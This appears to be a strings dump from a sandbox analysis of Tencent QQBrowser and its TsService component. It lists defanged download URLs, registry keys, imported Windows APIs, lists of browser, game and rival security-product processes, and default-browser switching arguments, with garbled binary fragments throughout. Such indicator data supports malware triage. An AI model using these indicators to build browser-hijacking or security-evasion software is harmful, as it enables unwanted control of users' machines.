{8D7E2E88-AB51-4F32-9ED0-7D25B0BEC6CA}
{30B804A7-87E1-4BA0-9E63-01656F1A7068}
{AA7BA0BD-0DF4-44BD-8D1C-601CD415A3FE}
{82AAD5A2-C37E-4AEB-93ED-11273BB006B2}
{FC376E97-7D37-4474-82D8-5B486B0F2846}
{403212B7-F146-4A3E-9AC2-9695A9C6807E}
{BB74B5A3-9852-4D45-9DFF-5FBBF918B379}
{3A990A19-B14A-4F11-8677-0D0757685289}
{2D12F2C4-81A8-4a51-8A3B-13CAD508A8FF}
{741DEC14-7422-4591-A47D-A2328370966A}
{C0CCCA14-4B09-469C-B572-CA69200657BC}
{843BD014-D194-4004-8BB6-6872E96106D7}
{86FF5168-028F-4744-AA58-AAA77747ECE7}
{2FEEE089-A27F-4E98-9A04-F5856660BE75}
{8A15D4B7-0FF4-4FD1-861B-4444A682119D}
{20000001-A27e-4298-9004-060F10002222}
{3250A054-07EF-4255-8773-04CE2C5A89F7}
%systemroot%\system32\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
DownloadUrl
hXXp://update.browser.qq.com/qbrowser
{"Cmd": %d,"GUID": "%s","UIN": "%s", "CVer": "%s", "CSoftID": %d, "TriggerMode": %d, "COS": "%s", "SupplyID": "%d", "COSLan": %d,"osDigit": %d}
explorer.exe
URLDownloadToFileW
VVV.qq.com
C:\SlaveDepot\beyond_build\branch_driver_qbd_rep\driver\service\Release\TsService.pdb
GetProcessHeap
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
RegQueryInfoKeyW
RegCreateKeyA
RegOpenKeyW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
SHCopyKeyW
SHDeleteKeyW
SHLWAPI.dll
WinHttpOpen
WinHttpConnect
WinHttpOpenRequest
WinHttpSendRequest
WinHttpWriteData
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpCloseHandle
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetProxyForUrl
WinHttpSetOption
WINHTTP.dll
WS2_32.dll
USERENV.dll
VERSION.dll
WTSAPI32.dll
WININET.dll
PSAPI.DLL
SETUPAPI.dll
RPCRT4.dll
NetGetJoinInformation
NetWkstaTransportEnum
NETAPI32.dll
DNSAPI.dll
GetCPInfo
PeekNamedPipe
zcÁ
.?AVQBUrlMon@@
.?AUIQBUrlMon@@
.?AVHttpSession@@
.?AVRegKey@util@@
.?AVWindowServiceApp@@
.?AVDevMsgRecvMgr@@
.?AUIDevMsgRecvMgr@@
.?AVReportDrvError@tasks@@
.?AVReportMsgCheckDelayTask@tasks@@
.?AVReportRivalInformation@tasks@@
.?AVLoginTask@tasks@@
.?AVStartMsgDispatchTask@tasks@@
.?AVReportDefaultBrowserTask@tasks@@
.?AVReportHeartbeatTask@tasks@@
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>
9œ9
4 4$4(4,40444
7(757^7|7
9#:(:::*;
8"8/8:8~8
5R5S5
<$=@=]=|=
1 1$1(1,101
4 4'4-424@4
0\0c0k0p0t0x0
<*=/=9=|=
=!=-=8=_=
7%7 757@7
3$4\4 5{5
9094989
2 2$2(2@2
5 5$5(5,5054585
0 0$0(0,0004080<0@0
9,989@9`9|9
2 2$2(2,20242
combase.dll
H.exe
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
USER32.DLL
?456789:;<=
!"#$%&'()* ,-./0123
2AC735B7-EE21-446C-BD6E-EE9FCD241C44
\driver\TsQBDrvDll.dll
\urlmon.dll
@\wininet.dll
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT %d.%d) QQBrowser/6.0
https
Akernel32.dll
HTTP/1.0
HTTP/1.1
~!@#$&*()=:/;? '
.setpay
.setreg
application/vnd.ms-excel
application/vnd.ms-outlook
application/vnd.ms-pkicertstore
application/vnd.ms-pkiseccat
application/vnd.ms-pkistl
application/vnd.ms-powerpoint
application/vnd.ms-project
application/vnd.ms-works
.bcpio
.cpio
.gtar
.latex
application/x-pkcs7-certificates
application/x-pkcs7-certreqresp
.shar
.sv4cpio
.sv4crc
.texi
.roff
.ustar
application/x-x509-ca-cert
application/ynd.ms-pkipko
.json
chrome
.html
.tiff
.webp
image/webp
Wintrust.dll
Crypt32.dll
%d.%d.%d.%d
ntdll.dll
Advapi32.dll
oWindows 2003
Windows XP
Windows 2000
Windows NT
Windows Vista
Windows 7
Windows 8
Windows 95
Windows 98
Windows ME
Windows Win32s
[build%d.%d.%d]
%d.%d.%d
MsgCheckDelayDisabled
advapi32.dll
qqbrowser.exe
chrome.exe
360se.exe
SogouExplorer.exe
%SystemRoot%
\Memory.Dmp
\bugreport.exe
TsQBDrv.sys
/drvinfo=%s="%ws"=%ws
d-d-%d d:d
user data\dbghelper\dbgeng.dll
dbgeng.dll
user data\dbghelper\dbghelp.dll
dbghelp.dll
%SystemRoot%\Minidump
Memory.Dmp
QQBROWSER_61823CD4-D3F7-4B36-87B8-8D736D9CD742
qbwup.imtt.qq.com
HExe
\QQBrowser.exe" -- "%1"
.mhtml
.shtml
.xhtml
QQBrowser.Protocol
SOFTWARE\Classes\Software\Tencent\QQBrowser\progid\http
SOFTWARE\Classes\Software\Tencent\QQBrowser\progid\https
SOFTWARE\Classes\Software\Tencent\QQBrowser\progid\ftp
QQBrowser.File
QB_EVENT_{A06F65A1-34AF-451a-8D19-A682E9997832}
TsQBDrv3.sys
QQBrowser.exe
Explorer.exe
--ShowDBUI %s
Cbugreport.exe
bugreport /buginfo:%p:%p:%p:%lu
\QQBrowser.exe" --sl-key
\vablist.ini
.DEFAULT\Software\Tencent\QQBrowser\extensions8\{2D12F2C4-81A8-4a51-8A3B-13CAD508A8FF}
9.0.0.53
device extension not exist or not support
wininit.exe
csrss.exe
winlogon.exe
smss.exe
%s.exe
QBServiceExeName
*\2345CHROME.E*
* HTTP://*
* "HTTP://*
* HTTPS://*
* "HTTPS://*
* WWW.*
LEAGUE OF LEGENDS.EXE
DNF.EXE
CROSSFIRE.EXE
WOW.EXE
AWESOMIUMPROCESS.EXE
TGAME.EXE
GAMEAPP.EXE
DOTA.EXE
QQX51_GAME.EXE
JX3LAUNCHER.EXE
JX3CLIENT.EXE
DRAGONNEST.EXE
MAPLESTORY.EXE
STARTASKTAO.EXE
YYC3D.EXE
SOUL.EXE
300.EXE
WANKU.EXE
KARTRIDER.EXE
WOOOLII.EXE
COSCLIENT.EXE
NZUONLINE.EXE
HEROESOFTHESTORM.EXE
QQSG.EXE
XY2.EXE
DIABLO III.EXE
FFXIV.EXE
9YINJH.EXE
MU.EXE
CSTRIKE-ONLINE.EXE
GAMEFILESYSTEM.EXE
NBA2KONLINE.EXE
TW2.EXE
TPS.EXE
{"arge1":"*IEXPLORE.EXE*"}
{"arge1":"*360SE.EXE*"}
{"arge1":"*2345EXPLORER.EXE*"}
{"arge1":"*SOGOUEXPLORER.EXE*"}
{"arge1":"*LIEBAO.EXE*"}
{"arge1":"*BAIDUBROWSER.EXE*"}
{"arge1":"*QQBROWSER.EXE*"}
{"arge1":"*CHROME.EXE*"}
{"arge1":"*UCBROWSER.EXE*"}
{"arge1":"*YIDIAN.EXE*"}
{"arge1":"*FIREFOX.EXE*"}
{"arge1":"*MAXTHON.EXE*"}
{"arge1":"*JUZI.EXE*"}
{"arge1":"*GREENBROWSER.EXE*"}
{"arge1":"*LEAGUE OF LEGENDS.EXE*","arge2":"*\\
{"arge1":"*DNF.EXE*","arge2":"*\\
{"arge1":"*CROSSFIRE.EXE*","arge2":"*\\
{"arge1":"*WOW.EXE*","arge2":"*\\WORLD OF WARCRAFT\\*"}
{"arge1":"*AWESOMIUMPROCESS.EXE*","arge2":"*\\
{"arge1":"*TGAME.EXE*","arge2":"*\\
{"arge1":"*GAMEAPP.EXE*","arge2":"*\\qq
{"arge1":"*DOTA.EXE*","arge2":"*\\dota2\\*"}
{"arge1":"*QQX51_GAME.EXE*","arge2":"*\\QQ
.EXE*","arge2":"*\\
{"arge1":"*JX3LAUNCHER.EXE*","arge2":"*\\JX3\\*"}
{"arge1":"*DRAGONNEST.EXE*","arge2":"*\\
{"arge1":"*MAPLESTORY.EXE*","arge2":"*\\
{"arge1":"*STARTASKTAO.EXE*"}
{"arge1":"*ELEMENTCLIENT.EXE*","arge2":"*\\
{"arge1":"*YYC3D.EXE*","arge2":"*\\
{"arge1":"*SOUL.EXE*","arge2":"*\\
{"arge1":"*300.EXE*","arge2":"*\\300
{"arge1":"*WANKU.EXE*","arge2":"*\\WANKU\\*"}
{"arge1":"*KARTRIDER.EXE*","arge2":"*\\POPKART\\*"}
{"arge1":"*WOOOLII.EXE*","arge2":"*\\
{"arge1":"*COSCLIENT.EXE*","arge2":"*\\QQMICROGAMEBOX\\*"}
{"arge1":"*NZUONLINE.EXE*","arge2":"*\\
{"arge1":"*HEROESOFTHESTORM.EXE*","arge2":"*\\
{"arge1":"*QQSG.EXE*","arge2":"*\\QQ
{"arge1":"*XY2.EXE*","arge2":"*\\
{"arge1":"*DIABLO III.EXE*","arge2":"*\\
{"arge1":"*TLBB.EXE*","arge2":"*\\
{"arge1":"*FFXIV.EXE*","arge2":"*\\
{"arge1":"*9YINJH.EXE*","arge2":"*\\
{"arge1":"*MU.EXE*","arge2":"*\\
{"arge1":"*CSTRIKE-ONLINE.EXE*","arge2":"*\\
{"arge1":"*GAMEFILESYSTEM.EXE*","arge2":"*\\
{"arge1":"*NBA2KONLINE.EXE*"}
{"arge1":"*TW2.EXE*","arge2":"*\\
{"arge1":"*TPS.EXE*","arge2":"*\\
\REGISTRY\USER\*_CLASSES\INTERNETEXPLORER.APPLICATION\CLSID
*KXETRAY.EXE
Software\Tencent\QQBrowser\QQBrowser.exe
\QQBrowser.exe"
--qsqbsource=1 --tipc-key=1 --tpc-key=1
\REGISTRY\USER\%s
\qbroker\qbroker.exe
1.0.0.2
%d_%d_%ws_%ws
Operation
*iexplore.exe*
*360se.exe*
*2345explorer.exe*
*sogouexplorer.exe*
*liebao.exe*
*baidubrowser.exe*
*qqbrowser.exe*
*chrome.exe*
*ucbrowser.exe*
*yidian.exe*
*firefox.exe*
*maxthon.exe*
*juzi.exe*
*greenbrowser.exe*
*\qqbrowser.exe" --type=renderer*
operation
-host=extension -independentmode=2 -extensionlist={66AC5389-365D-4B55-BF5C-5A2A4BC21CCD}
hXXp://wup.imtt.qq.com:8080
dpush.browser.qq.com
-pushmsg=
A"%s"
"%s" %s
qq.exe
QB-STARTUP-EVENT-NAME-6D67A60E-9EC4-48d5-B1BC-683935457737
SOFTWARE\360chrome
SOFTWARE\360\360se6\chrome
SOFTWARE\2345Chrome
SOFTWARE\Google\Chrome\BLBeacon
SOFTWARE\Mozilla\Mozilla Firefox
360tray.exe
zhudongfangyu.exe
kxetray.exe
ksafetray.exe
kxescore.exe
2345safetray.exe
2345service.exe
baiduantray.exe
baiduansvc.exe
qqpcrtp.exe
qqpctray.exe
rstray.exe
ravmond.exe
sogoucloud.exe
imeutil.exe
safari.exe
firefox.exe
opera.exe
avant.exe
-module=assistant.dll -setdefaultbrowser
LogError.qb
SOFTWARE\Tencent\QQBrowser\Capabilities\URLAssociations
SOFTWARE\Wow6432Node\Tencent\QQBrowser\Capabilities\URLAssociations
qbutils.dll
\Microsoft.VC90.CRT\
\Microsoft.VC90.CRT\msvcp90.dll
\Microsoft.VC90.CRT\msvcr90.dll
\Microsoft.VC90.CRT\Microsoft.VC90.CRT.manifest
f1assistant.dll
QQBrowserLiveup.exe
desc.txt
x-tx-host:wup.html5.qq.com
360Tray.exe
ZhuDongFangYu.exe
BaiduSdTray.exe
BaiduAnTray.exe
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\
360safe.exe
\Global.db
\\.\PhysicalDrive%d
\\.\Scsi%d:
iphlpapi.dll
0.0.0.0
}2.0.0.0
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\QBOverlayIcon
\*.dll
regsvr32.exe
l.update
TsService.exe
" -- "%1"
\http
\https
QQBrowser-File-44C200C9-E3C5-419B-886C-DBA2C05EFA6B
urlmon.dll
Mddddd
kerneltracecontrol.dll
qbtrace.dll
hXXp://dldir1.qq.com/invc/tt/FA359D51-8162-4239-9D5A-89439E0C4F87
hXXp://dldir1.qq.com/invc/tt/76D43AB7-48F6-4B77-AED3-B55C306F6449
bugreport /trcinfo=
\*.etl
\\.\{2E46F324-829A-4d67-A552-8FC694D6617E}
\QMInterface.dll
Tencent\QQBrowser\ProblemFix\QQBrowserFix.exe
QQBrowserSecurityCenter.exe
-module=assistant.dll -isqbdefault
drivers\TsQBDrv.sys
IEXPLORE.EXE
LIEBAO.EXE
QQBROWSER.EXE
CHROME.EXE
UCBROWSER.EXE
YIDIAN.EXE
FIREFOX.EXE
*KXETRAY.EXE*
*360SAFE.EXE*
*KCLEANER.EXE*
*KSCAN.EXE*
*KSOFTMGR.EXE*
*KBOOTOPT.EXE*
*QQ.EXE*
*QQURLMGR.EXE*
*QQCALL*.EXE*
*360TRAY.EXE*
*\WDTHELPER.DLL*
*\LBLOCKER.DLL*
*\KS3RDHMPG.DLL*
*\KSTDRHMPG.DLL*
*QQBROWSER.EXE*
*KSLAUNCH.EXE
%Documents and Settings%\%current user%\Application Data\QB\TsService.exe
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) QQBrowser/6.0
2015-12-25 04:02:16
2.0.997.400
2,0,997,400

QQBrowser.exe_4064:




.text
`.rdata
@.data
.rsrc
@.reloc
SHA256 block transform for x86, CRYPTOGAMS by <[email protected]>
HtdHtHHHt.HH
j.Yf;
_tcPVj@
.PjRW
d:\rdm\projects\7075\chrome\src\chrome\app\chrome_exe_main_win.cc
d:\rdm\projects\7075\chrome\src\chrome\app\client_util.cc
ChromeMain
-delay.dll
1.3.21.115
Chrome
0.0.0.0-devel
font_key_name
url-chunk
subresource_url
%s-%x
CHROME_PROBED_PROGRAM_FILES_PATH
chrome-sxs
googlechromeframe
Cannot initialize AppCommands from an invalid key.
d:\rdm\projects\7075\chrome\src\chrome\installer\util\app_commands.cc
Failed to open key "
Skipping over key "
d:\rdm\projects\7075\chrome\src\chrome\installer\util\language_selector.cc
Cannot initialize an AppCommand from an invalid key.
d:\rdm\projects\7075\chrome\src\chrome\installer\util\app_command.cc
kernel32.dll
d:\rdm\projects\7075\chrome\src\sandbox\win\src\sandbox_policy_base.cc
CreateNamedPipeW
NtCreateKey
NtOpenKey
NtOpenKeyEx
MetricsReportingEnabled
CHROME_VERSION
CHROME_HEADLESS
CHROME_METRO_CONNECTED
CHROME_CRASHED
CHROME_RESTART
CHROME_BREAKPAD_PIPE_NAME
d:\rdm\projects\7075\chrome\src\components\crash\content\app\breakpad_win.cc
NTDLL.DLL
USER32.dll
SHELL32.dll
ole32.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
RtlReportException
(0x%X)
Error (0x%X) while retrieving error. (0x%X)
%s-%Iu
(%d = %3.1f%%)
Histogram: %s recorded %d samples
(flags = 0x%x)
RPlatformFile.UnknownErrors.Windows
user32.dll
.syzygy
.thunks
full-memory-crash-report
D:\rdm\projects\7075\out\Release\initialexe\qqbrowser.exe.pdb
CloseWindowStation
CreateWindowStationW
SetProcessWindowStation
qqbrowser.exe
ClearBreakpadPipeEnvironmentVariable
ClearCrashKeyValueImpl
SetCrashKeyValueImpl
ZombieReport
SignalChromeElf
chrome_elf.dll
WINMM.dll
VERSION.dll
PSAPI.DLL
SHLWAPI.dll
RegCreateKeyExW
RegQueryInfoKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
GetProcessHeap
GetWindowsDirectoryW
CreateIoCompletionPort
GetProcessHandleCount
KERNEL32.dll
USERENV.dll
GetCPInfo
SetNamedPipeHandleState
TransactNamedPipe
WaitNamedPipeW
zcÁ
.DRNO
%uGK*
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="9.3.7078.400" version="9.3.7078.400" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>
> >$>(>,>0>4>~>
2 2$2(2,20242
6 6$6(6,6
= =@=`=|=
eTencent.QQBrowser.Default
shell32.dll
FQQBrowser.exe
QQBrowser_IE.exe
QQBrowser_Edge.exe
QQBrowser_Blink.exe
QQBrowser_Broker.exe
D%d.%d.%d.%d
Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}
Tencent\QQBrowser\User Data\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}
QBSafe.dll
\QBSafe.dll
F1Frame.dll
.F1Assistant.dll
.Downloader.dll
chrome_watcher.dll
chrome.dll
chrome_child.dll
chrome.exe
metro_driver.dll
{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}
{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}
Browse the web
Software\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser
-chrome
-chromeframe
WebAccessible
{8BA986DA-5100-405E-AA35-86F34A02ACBF}
BGoogle Chrome Frame
Google\Chrome Frame
Chrome in a Frame.
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome Frame
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_NLSTEXT
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
ntdll.dll
pipe\
Bkernel32.dll
kernelbase.dll
\Sessions\%d\AppContainerNamedObjects\%ls
ALPC Port
eKey
Ckernel32.dll
gdi32.dll
xntdll.dll
wow_helper.exe"
Crash Reports
script.log
resources.pak
chrome
pepflashplayer.dll
${windows}
\\.\pipe\GoogleCrashServices\
\\.\pipe\ChromeCrashServices
error %u
hunspecified-crash-key
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
rpcrt4.dll
%s\%s.dmp
x-x-x-xx-xxxxxx
InnerDoBugReport
bugreport.exe
bugreport /buginfo:%p:%p:%p:%lu
problem-url
kernelBase.dll
Ndebug.log
\StringFileInfo\xx\%ls
advapi32.dll
%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe
9.3.7078.400
QQBrowser_exe
QQBrowser.exe

QQBrowser.exe_1252:




.text
`.rdata
@.data
.rsrc
@.reloc
SHA256 block transform for x86, CRYPTOGAMS by <[email protected]>
HtdHtHHHt.HH
j.Yf;
_tcPVj@
.PjRW
d:\rdm\projects\7075\chrome\src\chrome\app\chrome_exe_main_win.cc
d:\rdm\projects\7075\chrome\src\chrome\app\client_util.cc
ChromeMain
-delay.dll
1.3.21.115
Chrome
0.0.0.0-devel
font_key_name
url-chunk
subresource_url
%s-%x
CHROME_PROBED_PROGRAM_FILES_PATH
chrome-sxs
googlechromeframe
Cannot initialize AppCommands from an invalid key.
d:\rdm\projects\7075\chrome\src\chrome\installer\util\app_commands.cc
Failed to open key "
Skipping over key "
d:\rdm\projects\7075\chrome\src\chrome\installer\util\language_selector.cc
Cannot initialize an AppCommand from an invalid key.
d:\rdm\projects\7075\chrome\src\chrome\installer\util\app_command.cc
kernel32.dll
d:\rdm\projects\7075\chrome\src\sandbox\win\src\sandbox_policy_base.cc
CreateNamedPipeW
NtCreateKey
NtOpenKey
NtOpenKeyEx
MetricsReportingEnabled
CHROME_VERSION
CHROME_HEADLESS
CHROME_METRO_CONNECTED
CHROME_CRASHED
CHROME_RESTART
CHROME_BREAKPAD_PIPE_NAME
d:\rdm\projects\7075\chrome\src\components\crash\content\app\breakpad_win.cc
NTDLL.DLL
USER32.dll
SHELL32.dll
ole32.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
RtlReportException
(0x%X)
Error (0x%X) while retrieving error. (0x%X)
%s-%Iu
(%d = %3.1f%%)
Histogram: %s recorded %d samples
(flags = 0x%x)
RPlatformFile.UnknownErrors.Windows
user32.dll
.syzygy
.thunks
full-memory-crash-report
D:\rdm\projects\7075\out\Release\initialexe\qqbrowser.exe.pdb
CloseWindowStation
CreateWindowStationW
SetProcessWindowStation
qqbrowser.exe
ClearBreakpadPipeEnvironmentVariable
ClearCrashKeyValueImpl
SetCrashKeyValueImpl
ZombieReport
SignalChromeElf
chrome_elf.dll
WINMM.dll
VERSION.dll
PSAPI.DLL
SHLWAPI.dll
RegCreateKeyExW
RegQueryInfoKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
GetProcessHeap
GetWindowsDirectoryW
CreateIoCompletionPort
GetProcessHandleCount
KERNEL32.dll
USERENV.dll
GetCPInfo
SetNamedPipeHandleState
TransactNamedPipe
WaitNamedPipeW
zcÁ
.DRNO
%uGK*
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="9.3.7078.400" version="9.3.7078.400" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>
> >$>(>,>0>4>~>
2 2$2(2,20242
6 6$6(6,6
= =@=`=|=
eTencent.QQBrowser.Default
shell32.dll
FQQBrowser.exe
QQBrowser_IE.exe
QQBrowser_Edge.exe
QQBrowser_Blink.exe
QQBrowser_Broker.exe
D%d.%d.%d.%d
Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}
Tencent\QQBrowser\User Data\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}
QBSafe.dll
\QBSafe.dll
F1Frame.dll
.F1Assistant.dll
.Downloader.dll
chrome_watcher.dll
chrome.dll
chrome_child.dll
chrome.exe
metro_driver.dll
{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}
{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}
Browse the web
Software\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser
-chrome
-chromeframe
WebAccessible
{8BA986DA-5100-405E-AA35-86F34A02ACBF}
BGoogle Chrome Frame
Google\Chrome Frame
Chrome in a Frame.
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome Frame
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_NLSTEXT
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
ntdll.dll
pipe\
Bkernel32.dll
kernelbase.dll
\Sessions\%d\AppContainerNamedObjects\%ls
ALPC Port
eKey
Ckernel32.dll
gdi32.dll
xntdll.dll
wow_helper.exe"
Crash Reports
script.log
resources.pak
chrome
pepflashplayer.dll
${windows}
\\.\pipe\GoogleCrashServices\
\\.\pipe\ChromeCrashServices
error %u
hunspecified-crash-key
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
rpcrt4.dll
%s\%s.dmp
x-x-x-xx-xxxxxx
InnerDoBugReport
bugreport.exe
bugreport /buginfo:%p:%p:%p:%lu
problem-url
kernelBase.dll
Ndebug.log
\StringFileInfo\xx\%ls
advapi32.dll
%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe
9.3.7078.400
QQBrowser_exe
QQBrowser.exe

QQBrowser.exe_3504:




.text
`.rdata
@.data
.rsrc
@.reloc
SHA256 block transform for x86, CRYPTOGAMS by <[email protected]>
HtdHtHHHt.HH
j.Yf;
_tcPVj@
.PjRW
d:\rdm\projects\7075\chrome\src\chrome\app\chrome_exe_main_win.cc
d:\rdm\projects\7075\chrome\src\chrome\app\client_util.cc
ChromeMain
-delay.dll
1.3.21.115
Chrome
0.0.0.0-devel
font_key_name
url-chunk
subresource_url
%s-%x
CHROME_PROBED_PROGRAM_FILES_PATH
chrome-sxs
googlechromeframe
Cannot initialize AppCommands from an invalid key.
d:\rdm\projects\7075\chrome\src\chrome\installer\util\app_commands.cc
Failed to open key "
Skipping over key "
d:\rdm\projects\7075\chrome\src\chrome\installer\util\language_selector.cc
Cannot initialize an AppCommand from an invalid key.
d:\rdm\projects\7075\chrome\src\chrome\installer\util\app_command.cc
kernel32.dll
d:\rdm\projects\7075\chrome\src\sandbox\win\src\sandbox_policy_base.cc
CreateNamedPipeW
NtCreateKey
NtOpenKey
NtOpenKeyEx
MetricsReportingEnabled
CHROME_VERSION
CHROME_HEADLESS
CHROME_METRO_CONNECTED
CHROME_CRASHED
CHROME_RESTART
CHROME_BREAKPAD_PIPE_NAME
d:\rdm\projects\7075\chrome\src\components\crash\content\app\breakpad_win.cc
NTDLL.DLL
USER32.dll
SHELL32.dll
ole32.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
RtlReportException
(0x%X)
Error (0x%X) while retrieving error. (0x%X)
%s-%Iu
(%d = %3.1f%%)
Histogram: %s recorded %d samples
(flags = 0x%x)
RPlatformFile.UnknownErrors.Windows
user32.dll
.syzygy
.thunks
full-memory-crash-report
D:\rdm\projects\7075\out\Release\initialexe\qqbrowser.exe.pdb
CloseWindowStation
CreateWindowStationW
SetProcessWindowStation
qqbrowser.exe
ClearBreakpadPipeEnvironmentVariable
ClearCrashKeyValueImpl
SetCrashKeyValueImpl
ZombieReport
SignalChromeElf
chrome_elf.dll
WINMM.dll
VERSION.dll
PSAPI.DLL
SHLWAPI.dll
RegCreateKeyExW
RegQueryInfoKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
GetProcessHeap
GetWindowsDirectoryW
CreateIoCompletionPort
GetProcessHandleCount
KERNEL32.dll
USERENV.dll
GetCPInfo
SetNamedPipeHandleState
TransactNamedPipe
WaitNamedPipeW
zcÁ
.DRNO
%uGK*
